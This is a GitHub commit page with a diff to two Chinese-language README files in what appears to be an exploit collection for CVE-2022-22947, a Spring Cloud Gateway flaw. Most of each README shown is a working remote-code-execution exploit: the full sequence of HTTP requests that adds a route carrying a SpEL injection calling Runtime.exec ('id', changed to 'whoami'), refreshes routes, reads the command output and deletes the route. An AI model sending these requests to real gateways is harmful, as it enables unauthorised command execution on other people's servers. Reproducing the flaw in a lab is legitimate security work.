Skip to content

Commit

Permalink
update README.md
Browse files Browse the repository at this point in the history
  • Loading branch information
@helloexp
helloexp committed Mar 4, 2022
1 parent 35d64ea commit fff9522
Show file tree
Hide file tree
Showing 10 changed files with 11 additions and 11 deletions.
12 changes: 6 additions & 6 deletions 00-CVE_EXP/CVE-2022-22947/README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -7,7 +7,7 @@ Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(

[环境搭建过程](环境搭建)

服务启动后,访问`http://your-ip:8080`即可看到演示页面,这个页面的上游就是example.com。
服务启动后,访问`http://your-ip:9000`即可看到演示页面

## 漏洞复现

Expand All @@ -16,7 +16,7 @@ Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(

```
POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Host: localhost:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Expand All @@ -29,7 +29,7 @@ Content-Length: 328
"id": "hacktest",
"filters": [{
"name": "AddResponseHeader",
"args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"}
"args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"}
}],
"uri": "http://example.com",
"order": 0
Expand All @@ -41,7 +41,7 @@ Content-Length: 328

```
POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:8080
Host: localhost:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Expand All @@ -57,7 +57,7 @@ Content-Length: 0

```
GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Host: localhost:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Expand All @@ -73,7 +73,7 @@ Content-Length: 0

```
DELETE /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Host: localhost:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Expand Down
Binary file modified 00-CVE_EXP/CVE-2022-22947/images/1.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file modified 00-CVE_EXP/CVE-2022-22947/images/2.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file modified 00-CVE_EXP/CVE-2022-22947/images/3.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file modified 00-CVE_EXP/CVE-2022-22947/images/4.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
10 changes: 5 additions & 5 deletions 21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -16,7 +16,7 @@ Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(

```
POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Host: localhost:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Expand All @@ -29,7 +29,7 @@ Content-Length: 328
"id": "hacktest",
"filters": [{
"name": "AddResponseHeader",
"args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"}
"args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"}
}],
"uri": "http://example.com",
"order": 0
Expand All @@ -41,7 +41,7 @@ Content-Length: 328

```
POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:8080
Host: localhost:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Expand All @@ -57,7 +57,7 @@ Content-Length: 0

```
GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Host: localhost:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Expand All @@ -73,7 +73,7 @@ Content-Length: 0

```
DELETE /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Host: localhost:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Expand Down
Binary file modified 21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/1.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file modified 21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/2.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file modified 21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/3.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file modified 21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/4.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.

0 comments on commit fff9522

Please sign in to comment.